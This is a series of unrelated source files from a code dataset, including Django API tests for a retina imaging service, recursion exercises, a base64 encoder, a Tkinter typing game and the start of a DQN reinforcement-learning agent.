assert key is not None\n\n s = None\n try:\n s = self.get_session()\n users = s.query(OIDCUser).filter(OIDCUser.username == key).all()\n if len(users) == 1:\n s.delete(users[0])\n s.commit()\n except Exception as e:\n log.exception(\"Database commit failed\")\n finally:\n if s is not None:\n s.close()\n\n def __contains__(self, key):\n log.debug(\"Key: \" + str(key))\n # Return True if key is contained in the database.\n assert key is not None\n\n s = None\n count=0\n try:\n s = self.get_session()\n users = s.query(OIDCUser).filter(OIDCUser.username == key).all()\n count = len(users)\n except Exception as e:\n log.exception(\"Database query failed\")\n finally:\n if s is not None:\n s.close()\n\n if count > 0:\n log.debug(\"Result True\")\n return True\n else:\n log.debug(\"Result False\")\n return False","sub_path":"ssixa/base/database/userinfodb.py","file_name":"userinfodb.py","file_ext":"py","file_size_in_byte":8272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"473502183","text":"\"\"\"\nThis is a function for a recursive sum of an array. \n\"\"\"\ndef _findSum(arr, N): \n if len(arr)== 1: \n return arr[0] \n else: \n return arr[0]+_findSum(arr[1:], N) \n\ndef fibonacci(n):\n \"\"\"\n This is a fibonacci function The function has been optimised with the use of memoization.\n\n Calculate nth term in fibonacci sequence\n \n Args:\n n (int): nth term in fibonacci sequence to calculate\n \n Returns:\n int: nth term of fibonacci sequence,\n equal to sum of previous two terms\n \n Examples:\n >>> fibonacci(1)\n 1 \n >> fibonacci(2)\n 1\n >> fibonacci(3)\n 2\n \"\"\"\n #The cache is where reults will be stored in memory so that as the sequence gets longer and more complex it doesn't slow down\n fibonacci_cache = {}\n\n\n #this is to optimize the sequence to run faster as the sequence gets longer\n if n in fibonacci_cache:\n return fibonacci_cache[n]\n \n #The fibonacci sequence and how it works through the numbers\n if n == 1:\n value = 1\n elif n == 2:\n value = 1\n elif n > 2:\n value = fibonacci(n-1) + fibonacci(n-2)\n '''Return nth term in fibonacci sequence\n from cache if the value is in a really high number'''\n fibonacci_cache[n] = value\n return value\n\n\n\ndef factorial(n):\n \"\"\"\n check if number greater than 1 as there is no real test case for - or zero factorial\n we use while so that the code runs hopefully quicker but there is no real advantage in this\n unless you have something else running but this function we don't so it's just nice to have\n \"\"\"\n while n >= 1:\n #we return what the multiplication of the number that is our base case with all numbers smaller \n return n * factorial(n - 1)\n \n #Return n! we will get 1 if we search for factorial of 1 hence this code\n return 1\n\n\n\ndef reverse(word):\n\n \"\"\"\n Return a string that has been reversed\n Args:\n word (str): a string \n Returns:\n str: word string reversed and given backwards\n \n Examples:\n >>> reverse('cheese')\n 'eseehc'\n >>> reverse('banana')\n 'ananab'\n >>> reverse('awesome')\n 'emosewa'\n \"\"\"\n if len(word) == 0:\n return word\n else:\n return reverse(word[1:]) + word[0]","sub_path":"AndilePackage/Recursion.py","file_name":"Recursion.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95011023","text":"import base64\nimport json\nimport random\nfrom io import BytesIO\n\nimport SimpleITK\nimport pytest\nfrom PIL import Image as PILImage\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom rest_framework import status\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.compat import LONG_SEPARATORS, SHORT_SEPARATORS\nfrom rest_framework.settings import api_settings\nfrom rest_framework.utils import encoders\n\nfrom grandchallenge.retina_api.serializers import (\n TreeImageSerializer,\n TreeObjectSerializer,\n)\nfrom grandchallenge.subdomains.utils import reverse\nfrom tests.cases_tests.factories import (\n ImageFactoryWithImageFile,\n ImageFactoryWithImageFile2DLarge,\n ImageFactoryWithImageFile3DLarge3Slices,\n ImageFactoryWithImageFile3DLarge4Slices,\n)\nfrom tests.retina_api_tests.helpers import (\n batch_test_data_endpoints,\n batch_test_image_endpoint_redirects,\n client_force_login,\n client_login,\n create_datastructures_data,\n get_user_from_str,\n)\n\n\n@pytest.mark.django_db\nclass TestArchiveIndexAPIEndpoints:\n def test_archive_view_non_auth(self, client):\n # Clear cache manually (this is not done by pytest-django for some reason...)\n cache.clear()\n url = reverse(\"retina:api:archives-api-view\")\n response = client.get(url, HTTP_ACCEPT=\"application/json\")\n assert response.status_code == status.HTTP_403_FORBIDDEN\n\n def test_archive_view_normal_non_auth(self, client):\n # Create data\n create_datastructures_data()\n\n # login client\n client, _ = client_login(client, user=\"normal\")\n\n url = reverse(\"retina:api:archives-api-view\")\n response = client.get(url, HTTP_ACCEPT=\"application/json\")\n assert response.status_code == status.HTTP_403_FORBIDDEN\n\n def test_archive_view_retina_auth(self, client):\n # Create data\n create_datastructures_data()\n\n # login client\n client, _ = client_login(client, user=\"retina_user\")\n\n url = reverse(\"retina:api:archives-api-view\")\n response = client.get(url, HTTP_ACCEPT=\"application/json\")\n assert response.status_code == status.HTTP_200_OK\n\n def test_archive_view_returns_correct_data(self, client):\n # Clear cache manually (this is not done by pytest-django for some reason...)\n cache.clear()\n # Create data\n (\n datastructures,\n datastructures_aus,\n oct_obs_registration,\n oct_obs_registration_aus,\n ) = create_datastructures_data()\n\n # login client\n client, _ = client_login(client, user=\"retina_user\")\n\n url = reverse(\"retina:api:archives-api-view\")\n response = client.get(url, HTTP_ACCEPT=\"application/json\")\n response_data = json.loads(response.content)\n # check if correct data is sent\n expected_response_data = {\n \"subfolders\": {\n datastructures[\"archive\"].name: {\n \"subfolders\": {\n datastructures[\"patient\"].name: {\n \"subfolders\": {\n datastructures[\"study_oct\"].name: {\n \"info\": \"level 5\",\n \"images\": {\n datastructures[\"image_oct\"].name: {\n \"images\": {\n \"trc_000\": \"no info\",\n \"obs_000\": str(\n datastructures[\n \"image_obs\"\n ].id\n ),\n \"mot_comp\": \"no info\",\n \"trc_001\": \"no info\",\n \"oct\": str(\n datastructures[\n \"image_oct\"\n ].id\n ),\n },\n \"info\": {\n \"voxel_size\": {\n \"axial\": 0,\n \"lateral\": 0,\n \"transversal\": 0,\n },\n \"date\": datastructures[\n \"study_oct\"\n ].datetime.strftime(\n \"%Y/%m/%d %H:%M:%S\"\n ),\n \"registration\": {\n \"obs\": \"Checked separately\",\n \"trc\": [0, 0, 0, 0],\n },\n },\n }\n },\n \"name\": datastructures[\"study_oct\"].name,\n \"id\": str(datastructures[\"study_oct\"].id),\n \"subfolders\": {},\n },\n datastructures[\"study\"].name: {\n \"info\": \"level 5\",\n \"images\": {\n datastructures[\"image_cf\"].name: str(\n datastructures[\"image_cf\"].id\n )\n },\n \"name\": datastructures[\"study\"].name,\n \"id\": str(datastructures[\"study\"].id),\n \"subfolders\": {},\n },\n },\n \"info\": \"level 4\",\n \"name\": datastructures[\"patient\"].name,\n \"id\": str(datastructures[\"patient\"].id),\n \"images\": {},\n }\n },\n \"info\": \"level 3\",\n \"name\": datastructures[\"archive\"].name,\n \"id\": str(datastructures[\"archive\"].id),\n \"images\": {},\n },\n datastructures_aus[\"archive\"].name: {\n \"subfolders\": {\n datastructures_aus[\"patient\"].name: {\n \"subfolders\": {},\n \"info\": \"level 4\",\n \"name\": datastructures_aus[\"patient\"].name,\n \"id\": str(datastructures_aus[\"patient\"].id),\n \"images\": {\n datastructures_aus[\"image_oct\"].name: {\n \"images\": {\n \"trc_000\": \"no info\",\n \"obs_000\": str(\n datastructures_aus[\"image_obs\"].id\n ),\n \"mot_comp\": \"no info\",\n \"trc_001\": \"no info\",\n \"oct\": str(\n datastructures_aus[\"image_oct\"].id\n ),\n },\n \"info\": {\n \"voxel_size\": {\n \"axial\": 0,\n \"lateral\": 0,\n \"transversal\": 0,\n },\n \"date\": datastructures_aus[\n \"study_oct\"\n ].datetime.strftime(\n \"%Y/%m/%d %H:%M:%S\"\n ),\n \"registration\": {\n \"obs\": \"Checked separately\",\n \"trc\": [0, 0, 0, 0],\n },\n },\n },\n datastructures_aus[\"image_cf\"].name: str(\n datastructures_aus[\"image_cf\"].id\n ),\n },\n }\n },\n \"info\": \"level 3\",\n \"name\": datastructures_aus[\"archive\"].name,\n \"id\": str(datastructures_aus[\"archive\"].id),\n \"images\": {},\n },\n },\n \"info\": \"level 2\",\n \"name\": \"Archives\",\n \"id\": \"none\",\n \"images\": {},\n }\n\n # Compare floats separately because of intricacies of floating-point arithmetic in python\n try:\n # Get info objects of both archives in response data\n response_archive_info = (\n response_data.get(\"subfolders\")\n .get(datastructures[\"archive\"].name)\n .get(\"subfolders\")\n .get(datastructures[\"patient\"].name)\n .get(\"subfolders\")\n .get(datastructures[\"study_oct\"].name)\n .get(\"images\")\n .get(datastructures[\"image_oct\"].name)\n .get(\"info\")\n )\n response_archive_australia_info = (\n response_data.get(\"subfolders\")\n .get(datastructures_aus[\"archive\"].name)\n .get(\"subfolders\")\n .get(datastructures_aus[\"patient\"].name)\n .get(\"images\")\n .get(datastructures_aus[\"image_oct\"].name)\n .get(\"info\")\n )\n\n floats_to_compare = (\n []\n ) # list of (response_float, expected_float, name) tuples\n for archive, response_info, oor in (\n (\"Rotterdam\", response_archive_info, oct_obs_registration),\n (\n \"Australia\",\n response_archive_australia_info,\n oct_obs_registration_aus,\n ),\n ):\n # oct obs registration\n response_obs = response_info.get(\"registration\").get(\"obs\")\n rv = oor.registration_values\n floats_to_compare.append(\n (\n response_obs[0],\n rv[0][0],\n archive + \" obs oct registration top left x\",\n )\n )\n floats_to_compare.append(\n (\n response_obs[1],\n rv[0][1],\n archive + \" obs oct registration top left y\",\n )\n )\n floats_to_compare.append(\n (\n response_obs[2],\n rv[1][0],\n archive + \" obs oct registration bottom right x\",\n )\n )\n floats_to_compare.append(\n (\n response_obs[3],\n rv[1][1],\n archive + \" obs oct registration bottom right y\",\n )\n )\n\n # Compare floats\n for result, expected, name in floats_to_compare:\n if result != pytest.approx(expected):\n pytest.fail(name + \" does not equal expected value\")\n\n # Clear voxel and obs registration objects before response object to expected object comparison\n response_data[\"subfolders\"][datastructures[\"archive\"].name][\n \"subfolders\"\n ][datastructures[\"patient\"].name][\"subfolders\"][\n datastructures[\"study_oct\"].name\n ][\n \"images\"\n ][\n datastructures[\"image_oct\"].name\n ][\n \"info\"\n ][\n \"registration\"\n ][\n \"obs\"\n ] = \"Checked separately\"\n\n response_data[\"subfolders\"][datastructures_aus[\"archive\"].name][\n \"subfolders\"\n ][datastructures_aus[\"patient\"].name][\"images\"][\n datastructures_aus[\"image_oct\"].name\n ][\n \"info\"\n ][\n \"registration\"\n ][\n \"obs\"\n ] = \"Checked separately\"\n\n except (AttributeError, KeyError, TypeError):\n pytest.fail(\"Response object structure is not correct\")\n\n assert response_data == expected_response_data\n\n def test_caching(self, client):\n # Clear cache manually\n cache.clear()\n # Perform normal request\n datastructures, _, _, _ = create_datastructures_data()\n client, _ = client_login(client, user=\"retina_user\")\n url = reverse(\"retina:api:archives-api-view\")\n response = client.get(url, HTTP_ACCEPT=\"application/json\")\n response_data = json.loads(response.content)\n # Remove archive and perform request again\n datastructures[\"archive\"].delete()\n response = client.get(url, HTTP_ACCEPT=\"application/json\")\n # Check that response is cached so it is not changed\n assert json.loads(response.content) == response_data\n\n\n@pytest.mark.django_db\nclass TestImageAPIEndpoint:\n # test methods are added dynamically\n pass\n\n\nbatch_test_image_endpoint_redirects(TestImageAPIEndpoint)\n\n\n@pytest.mark.django_db\nclass TestDataAPIEndpoint:\n # test methods are added dynamically\n pass\n\n\nbatch_test_data_endpoints(TestDataAPIEndpoint)\n\n\n@pytest.mark.django_db\nclass TestImageElementSpacingView:\n @pytest.mark.parametrize(\n \"user\", [\"anonymous\", \"normal\", \"staff\", \"retina_user\"]\n )\n def test_no_access(self, client, user):\n image = ImageFactoryWithImageFile()\n url = reverse(\"retina:api:image-element-spacing-view\", args=[image.pk])\n client, _ = client_login(client, user=user)\n response = client.get(url)\n assert response.status_code == status.HTTP_403_FORBIDDEN\n\n @pytest.mark.parametrize(\n \"user,expected_status\",\n [\n (\"anonymous\", status.HTTP_403_FORBIDDEN),\n (\"normal\", status.HTTP_403_FORBIDDEN),\n (\"staff\", status.HTTP_403_FORBIDDEN),\n (\"retina_user\", status.HTTP_200_OK),\n ],\n )\n def test_access(self, client, user, expected_status):\n image = ImageFactoryWithImageFile()\n image.permit_viewing_by_retina_users()\n url = reverse(\"retina:api:image-element-spacing-view\", args=[image.pk])\n client, _ = client_login(client, user=user)\n response = client.get(url)\n assert response.status_code == expected_status\n\n def test_returns_correct_spacing(self, client):\n image = ImageFactoryWithImageFile()\n image.permit_viewing_by_retina_users()\n url = reverse(\"retina:api:image-element-spacing-view\", args=[image.pk])\n client, _ = client_login(client, user=\"retina_user\")\n response = client.get(url)\n assert response.status_code == status.HTTP_200_OK\n r = response.json()\n assert list(image.get_sitk_image().GetSpacing()) == r\n\n\n@pytest.mark.django_db\nclass TestArchiveAPIView:\n @staticmethod\n def perform_request(client, user, pk=None):\n url = reverse(\n \"retina:api:archive-data-api-view\",\n args=[pk] if pk is not None else [],\n )\n user_model = get_user_from_str(user)\n kwargs = {}\n if user_model is not None and not isinstance(user_model, str):\n token_object, _ = Token.objects.get_or_create(user=user_model)\n kwargs.update({\"HTTP_AUTHORIZATION\": f\"Token {token_object.key}\"})\n return client.get(url, **kwargs)\n\n @staticmethod\n def expected_result_json(objects, images):\n objects_serialized = TreeObjectSerializer(objects, many=True).data\n images_serialized = TreeImageSerializer(images, many=True).data\n\n response = {\n \"directories\": sorted(objects_serialized, key=lambda x: x[\"name\"]),\n \"images\": sorted(images_serialized, key=lambda x: x[\"name\"]),\n }\n return json.dumps(\n response,\n cls=encoders.JSONEncoder,\n ensure_ascii=not api_settings.UNICODE_JSON,\n allow_nan=not api_settings.STRICT_JSON,\n separators=SHORT_SEPARATORS\n if api_settings.COMPACT_JSON\n else LONG_SEPARATORS,\n )\n\n @pytest.mark.parametrize(\n \"user,expected_status\",\n [\n (\"anonymous\", status.HTTP_401_UNAUTHORIZED),\n (\"normal\", status.HTTP_403_FORBIDDEN),\n (\"staff\", status.HTTP_403_FORBIDDEN),\n (\"retina_user\", status.HTTP_200_OK),\n ],\n )\n def test_access(self, client, user, expected_status):\n response = self.perform_request(client, user)\n assert response.status_code == expected_status\n\n def test_empty(self, client):\n # Clear cache manually\n cache.clear()\n response = self.perform_request(client, \"retina_user\")\n assert response.status_code == status.HTTP_200_OK\n assert response.content == b'{\"directories\":[],\"images\":[]}'\n\n @pytest.mark.parametrize(\n \"pk,objects,images\",\n [\n (None, [\"archive1\", \"archive2\"], None),\n (\"archive1\", [\"patient11\", \"patient12\"], None),\n (\"patient11\", [\"study111\", \"study112\", \"study113\"], None),\n (\"study111\", [], \"images111\"),\n (\"archive2\", [], \"images211\"),\n ],\n )\n def test_with_data_patient(\n self, client, archive_patient_study_image_set, pk, objects, images\n ):\n # Clear cache manually\n cache.clear()\n if pk is not None:\n pk = getattr(archive_patient_study_image_set, pk).pk\n response = self.perform_request(client, \"retina_user\", pk)\n assert response.status_code == status.HTTP_200_OK\n objects = [\n getattr(archive_patient_study_image_set, o) for o in objects\n ]\n imgs = []\n if images is not None:\n imgs = getattr(archive_patient_study_image_set, images)\n assert response.content.decode() == self.expected_result_json(\n objects, imgs\n )\n\n def test_caching(self, client, archive_patient_study_image_set):\n # Clear cache manually\n cache.clear()\n # Perform normal request\n response = self.perform_request(client, \"retina_user\")\n assert response.status_code == status.HTTP_200_OK\n json_response = response.content.decode()\n # Remove data\n archive_patient_study_image_set.archive1.delete()\n archive_patient_study_image_set.archive2.delete()\n # Perform request again and expect unchanged response\n response = self.perform_request(client, \"retina_user\")\n assert response.status_code == status.HTTP_200_OK\n assert response.content.decode() == json_response\n\n\n@pytest.mark.django_db\nclass TestBase64ThumbnailView:\n @pytest.mark.parametrize(\n \"user,expected_status\",\n [\n (\"anonymous\", status.HTTP_401_UNAUTHORIZED),\n (\"normal\", status.HTTP_403_FORBIDDEN),\n (\"staff\", status.HTTP_403_FORBIDDEN),\n (\"retina_user\", status.HTTP_200_OK),\n ],\n )\n def test_access_and_defaults(self, client, user, expected_status):\n image = ImageFactoryWithImageFile()\n image.permit_viewing_by_retina_users()\n url = reverse(\"retina:api:image-thumbnail\", kwargs={\"pk\": image.pk})\n user_model = get_user_from_str(user)\n kwargs = {}\n if user_model is not None and not isinstance(user_model, str):\n token_object, _ = Token.objects.get_or_create(user=user_model)\n kwargs.update({\"HTTP_AUTHORIZATION\": f\"Token {token_object.key}\"})\n response = client.get(url, **kwargs)\n assert response.status_code == expected_status\n\n @staticmethod\n def perform_thumbnail_request(client, image, max_dimension):\n image.permit_viewing_by_retina_users()\n kwargs = {\"pk\": image.id}\n if max_dimension != settings.RETINA_DEFAULT_THUMBNAIL_SIZE:\n kwargs.update({\"width\": max_dimension, \"height\": max_dimension})\n url = reverse(\"retina:api:image-thumbnail\", kwargs=kwargs)\n client, user_model = client_force_login(client, user=\"retina_user\")\n token = f\"Token {Token.objects.create(user=user_model).key}\"\n response = client.get(url, HTTP_AUTHORIZATION=token)\n return response\n\n @staticmethod\n def get_b64_from_image(image, max_dimension, is_3d=False):\n image_sitk = image.get_sitk_image()\n image_nparray = SimpleITK.GetArrayFromImage(image_sitk)\n if is_3d:\n depth = image_sitk.GetDepth()\n assert depth > 0\n # Get center slice of 3D image\n image_nparray = image_nparray[depth // 2]\n\n image_pil = PILImage.fromarray(image_nparray)\n image_pil.thumbnail((max_dimension, max_dimension), PILImage.ANTIALIAS)\n buffer = BytesIO()\n image_pil.save(buffer, format=\"png\")\n image_base64_str = base64.b64encode(buffer.getvalue())\n return image_base64_str\n\n def do_test_thumbnail_creation(\n self, client, max_dimension, image, is_3d=False\n ):\n response = self.perform_thumbnail_request(client, image, max_dimension)\n\n assert response.status_code == status.HTTP_200_OK\n image_base64_str = self.get_b64_from_image(image, max_dimension, is_3d)\n\n returned_img = PILImage.open(\n BytesIO(base64.b64decode(response.content))\n )\n assert response.content == image_base64_str\n width, height = returned_img.size\n assert max(width, height) == max_dimension\n\n @pytest.mark.parametrize(\n \"is_3d,image_factory\",\n [\n (False, ImageFactoryWithImageFile2DLarge),\n (True, ImageFactoryWithImageFile3DLarge3Slices),\n (True, ImageFactoryWithImageFile3DLarge4Slices),\n ],\n )\n @pytest.mark.parametrize(\"max_dimension\", [\"default\", \"random\"])\n def test_correct_image(self, client, max_dimension, is_3d, image_factory):\n image = image_factory()\n if max_dimension == \"random\":\n max_dimension = random.randint(1, 255)\n else:\n max_dimension = settings.RETINA_DEFAULT_THUMBNAIL_SIZE\n self.do_test_thumbnail_creation(\n client, max_dimension, image, is_3d=is_3d\n )\n","sub_path":"app/tests/retina_api_tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":23415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"104817886","text":"#n = int(input())\nn, m = map(int, input().split())\n#l = list(map(int,input().split()))\nal = [list(input()) for i in range(n)]\nbl = [list(input()) for i in range(m)]\n\n\ndef same(i, j):\n res = True\n for row in range(m):\n for col in range(m):\n if al[i+row][j+col] != bl[row][col]:\n res = False\n return res\n\n\nans = 'No'\nfor i in range(n-m+1):\n for j in range(n-m+1):\n if same(i, j):\n ans = 'Yes'\nprint(ans)\n","sub_path":"ABC054/ABC054_A.py","file_name":"ABC054_A.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"548355943","text":"from common.lib.servers.Pulser2.pulse_sequences.pulse_sequence import pulse_sequence\nfrom Qsim.scripts.pulse_sequences.sub_sequences.doppler_cooling import DopplerCooling\nfrom Qsim.scripts.pulse_sequences.sub_sequences.microwave_pulse_sequences.microwave_interrogation_minus import MicrowaveInterrogationMinus\nfrom Qsim.scripts.pulse_sequences.sub_sequences.turn_off_all import TurnOffAll\nfrom Qsim.scripts.pulse_sequences.sub_sequences.state_detection.standard_state_detection import StandardStateDetection\nfrom Qsim.scripts.pulse_sequences.sub_sequences.optical_pumping import OpticalPumping\n\n\nclass MicrowavePointMinus(pulse_sequence):\n\n required_subsequences = [TurnOffAll, DopplerCooling,\n MicrowaveInterrogationMinus,\n StandardStateDetection,\n OpticalPumping]\n\n required_parameters = [\n ]\n\n def sequence(self):\n p = self.parameters\n\n self.addSequence(TurnOffAll)\n self.addSequence(DopplerCooling)\n self.addSequence(OpticalPumping)\n self.addSequence(MicrowaveInterrogationMinus)\n self.addSequence(StandardStateDetection)\n","sub_path":"scripts/pulse_sequences/microwave_point/microwave_point_minus.py","file_name":"microwave_point_minus.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"126464217","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 17 17:06:30 2021\n\n@author: hossein\n\"\"\"\nimport numpy as np\nimport torch\nimport os \n\n\ndef data_delivery(main_path,\n path_attr=None,\n path_start=None,\n only_id=False,\n double = True,\n need_collection=False,\n need_attr=True):\n '''\n \n\n Parameters\n ----------\n main_path : TYPE string\n DESCRIPTION. the path of images folder\n path_attr : TYPE numpy array\n DESCRIPTION.\n path_start : TYPE \n DESCRIPTION.\n double : TYPE true/false\n DESCRIPTION. will double everything and return \n need_collection : TYPE true/false\n DESCRIPTION. The default is False.\n if it is false returns a tuple containes a list of \n image_names and their attributes in numpy and a list of ids \n need_attr : when we want to see the whole attributes as a target vector \n Returns\n only_id : when you need only id and id_weights. \n -------\n None.\n\n '''\n \n if path_attr:\n # loading attributes\n start_point = np.load(path_start)\n attr_vec_np = np.load(path_attr)# loading attributes\n \n # attributes\n attr_vec_np = attr_vec_np.astype(np.int32)\n attr_vec_np = attr_vec_np[:start_point]\n if double:\n attr_vec_np = np.append(attr_vec_np,attr_vec_np,axis=0)\n \n # images names\n \n img_names = os.listdir(main_path)\n img_names.sort()\n if only_id:\n pass\n else:\n img_names = img_names[:start_point]\n img_names = np.array(img_names)\n if double:\n img_names = list(np.append(img_names,img_names,axis=0))\n \n # ids & ids_weights\n id_ = []\n cam_id = []\n for name in img_names:\n b = name.split('_')\n id_.append(int(b[0])-1)\n cam_id.append(int(b[1][1]))\n id_ = torch.from_numpy(np.array(id_))# becuase list doesnt take a list of indexes it should be slice or inegers.\n cam_id = np.array(cam_id)\n # numbers = torch.unique(id_) # return individual numbers in a tensor\n iterations = torch.bincount(id_) # return iterations of each individual number \n gp = (int(torch.max(iterations))-int(torch.min(iterations)))//5\n min_it = int(torch.min(iterations))\n id_weights = torch.ones(iterations.size())\n \n for j in range(len(id_weights)):\n if min_it Menu:\n system_tray = MagicMock()\n node_set = MagicMock()\n node_set.lnd.rest_url = 'test rest'\n node_set.lnd.macaroon_path = 'test macaroon'\n menu = Menu(node_set=node_set, system_tray=system_tray)\n return menu\n\n\nclass TestJouleLayout(object):\n def test_copy_rest(self, menu: Menu, qtbot: QTest):\n menu.joule_url_action.trigger()\n assert QClipboard().text() == 'test rest'\n\n @patch('node_launcher.gui.menu.reveal')\n def test_show_macaroons(self, reveal_patch: MagicMock,\n menu: Menu, qtbot: QTest):\n menu.joule_macaroons_action.trigger()\n reveal_patch.assert_called_with('test macaroon')\n","sub_path":"tests/test_gui/test_network_buttons/test_joule_layout.py","file_name":"test_joule_layout.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"16237792","text":"'''\nAuthor: Jim Huang\nDate: 2022-01-30 10:17:04\nLastEditors: Jim Huang\nLastEditTime: 2022-01-30 10:50:21\nDescription: base64 \n'''\n\n\nalphabet = b\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\n\ndef base64encode(src:str):\n ret = bytearray()\n if isinstance(src,str):\n _src = src.encode()\n else:\n return\n\n length = len(_src)\n \n #r 记录补0 的个数\n r =0\n for offset in range(0,length,3):\n triple = _src[offset:offset+3]\n if offset +3 > length:\n r = 3 - len(triple)\n triple += b'\\x00'*r\n b = int.from_bytes(triple,\"big\")\n for i in range(18,-1,-6):\n if i == 18:\n index = b >> i\n else:\n index = b >> i & 0x3F\n ret.append(alphabet[index])\n if r:\n ret[-r:] = b\"=\"*r\n return bytes(ret)\n\n\nimport base64\n\nstrlist = [\"a\",\"`\",\"ab\",\"abc\",\"abcd\",\"ManMa\",\"教育a\"]\nfor x in strlist:\n print(x)\n print(base64encode(x))\n print(base64.b64encode(x.encode()))\n print()","sub_path":"MagePython/Chapter4/homework-2.py","file_name":"homework-2.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"239323944","text":"words = ['Apple','gun','Orange','umbrella','pumpkin','Greps','Guava','PEACOCK','LION','TIGER',\n 'APPLE','PINEAPPLE','POT','UNICORN','WATCH','TWILIGHT','WATERMELON','MANGO','sun',\n 'moon','star','planet','master','MUCH-kin','-----','......','/////','?????']\n\n\n\ndef labelslider():\n global count,sliderWord\n text = 'Welcome to speed typing game'\n if count >= len(text):\n count = 0\n sliderWord = ''\n sliderWord += text[count]\n count += 1\n rootLebel1.configure(text=sliderWord)\n rootLebel1.after(150,labelslider)\ndef timeleft():\n global time,score,miss\n if time > 0:\n time -= 1\n TimerLimitCount.configure(text=time)\n TimerLimitCount.after(1000,timeleft)\n if(time < 11):\n TimerLimitCount.configure(fg='red')\n else:\n gamePlaydetaillabel.configure(text='hit={} | miss={} | TotalScore={}'.format(score,miss,score-miss))\n rr = messagebox.askretrycancel(\"Notification\",'To play again hit retry button')\n if rr == True:\n score = 0\n time = 60\n miss = 0\n scoreLableCount.configure(text=score)\n TimerLimitCount.configure(text=time)\n wordLebel1.configure(text=words[0])\n\n\n\n\ndef startgame(event):\n global score,miss\n if time == 60:\n timeleft()\n gamePlaydetaillabel.configure(text='')\n if wordEntry.get() == wordLebel1['text']:\n score += 1\n scoreLableCount.configure(text=score)\n else:\n miss += 1\n\n random.shuffle(words)\n wordLebel1.configure(text=words[0])\n wordEntry.delete(0,END)\n\n\n\n\n\n\n\nfrom tkinter import messagebox\nimport random\nfrom tkinter import *\n\n####################### root method\nroot = Tk()\nroot.geometry('800x600+300+100')\nroot.configure(bg=\"light blue\")\nroot.title(\"Speed Typing Game\")\n#root.maxsize(height=600,width=800)\n#root.minsize(height=600,width=\nroot.iconbitmap(\"Yootheme-Social-Bookmark-Social-twitter-box-blue.ico\")\nroot.bind('',startgame)\n############################################# Variable\nscore = 0\ntime = 60\ncount = 0\nsliderWord = ''\nmiss = 0\n#_____________________Level Method_______________________\nrootLebel1 = Label(root,text=\"\",bg=\"light blue\",font=(\"arial\",25,\"italic bold\"),fg=\"red\",width=40)\nrootLebel1.place(x=10,y=10)\nlabelslider()\n\n\nrandom.shuffle(words)\nwordLebel1 = Label(root,text=words[0],font=('arial',35,\"italic bold\"),bg=\"light blue\")\nwordLebel1.place(x=300,y=200)\n\nscoreLabel1 = Label(root,text=\"Your Score:\",font=('arial',25,'italic bold'),bg='light blue',fg='black')\nscoreLabel1.place(x=10,y=100)\n\nscoreLableCount = Label(root,text=score,font=('arial',25,'italic bold'),bg=\"light blue\",fg=\"black\")\nscoreLableCount.place(x=60,y=150)\n\nTimerLimit = Label(root,text='Time left:',font=('arial',25,'italic bold'),bg='light blue',fg='black')\nTimerLimit.place(x=550,y=100)\n\nTimerLimitCount = Label(root,text=time,font=('arial',25,'italic bold'),bg='light blue',fg='black')\nTimerLimitCount.place(x=600,y=150)\n\n\ngamePlaydetaillabel = Label(root,text='Type Word and Hit Enter Button',font=('arial',25,'italic bold'),bg='light blue',fg='gray')\ngamePlaydetaillabel.place(x=150,y=500)\n\n#____________________________Entry Method__________________\nwordEntry = Entry(root,font=('arial',25,\"italic bold\"),bd=10,justify=\"center\")\nwordEntry.place(x=220,y=300)\nwordEntry.focus_set()\n\n\nroot.mainloop()","sub_path":"TypingSpeedGame.py","file_name":"TypingSpeedGame.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"374362195","text":"from pathlib import Path\n\nimport torch\nfrom Networks.basic_network import BasicCNN\nimport numpy as np\nfrom Networks.curiosity import Curiosity\nfrom utils.replay_memory import ReplayMemory\nfrom utils.util import get_training_sample\nfrom copy import deepcopy\n\n\n\nclass DqnAgent:\n def __init__(self, nb_actions, epsilon, capacity, num_episodes, learning_rate, batch_size, save_dir, curiosity=False):\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else torch.device('cpu'))\n self.nb_actions = nb_actions\n self.network = BasicCNN(self.nb_actions).to(self.device)\n self.save_dir = save_dir\n self.save_dir.mkdir(parents=True, exist_ok=True)\n self.target_network = deepcopy(self.network)\n self.epsilon = epsilon\n self.replay_memory = ReplayMemory(capacity)\n self.batch_size = batch_size\n self.gamma = 0.999\n self.loss_function = torch.nn.MSELoss()\n self.loss_function_state = torch.nn.BCEWithLogitsLoss()\n self.optimizer = torch.optim.RMSprop(self.network.parameters(), lr=learning_rate, weight_decay=1e-5)\n self.loss_names = [\"Q-value loss\", \"State loss\"]\n self.loss_per_episode = {loss_name: {i: [] for i in range(1, num_episodes + 1)} for loss_name in self.loss_names}\n self.iterations = 0\n if curiosity:\n print(\"Using curiosity for exploration\")\n self.curiosity_network = Curiosity()\n\n def select_action(self, state):\n if np.random.uniform() > self.epsilon:\n action = self.greedy_action(state)\n else:\n action = self.random_action()\n return action\n\n def greedy_action(self, state):\n state = torch.FloatTensor(state).to(self.device).unsqueeze(0).unsqueeze(0)\n with torch.no_grad():\n q_values, _ = self.network(state)\n best_action = torch.argmax(q_values.detach().cpu(), dim=1).item()\n return best_action\n\n def random_action(self):\n 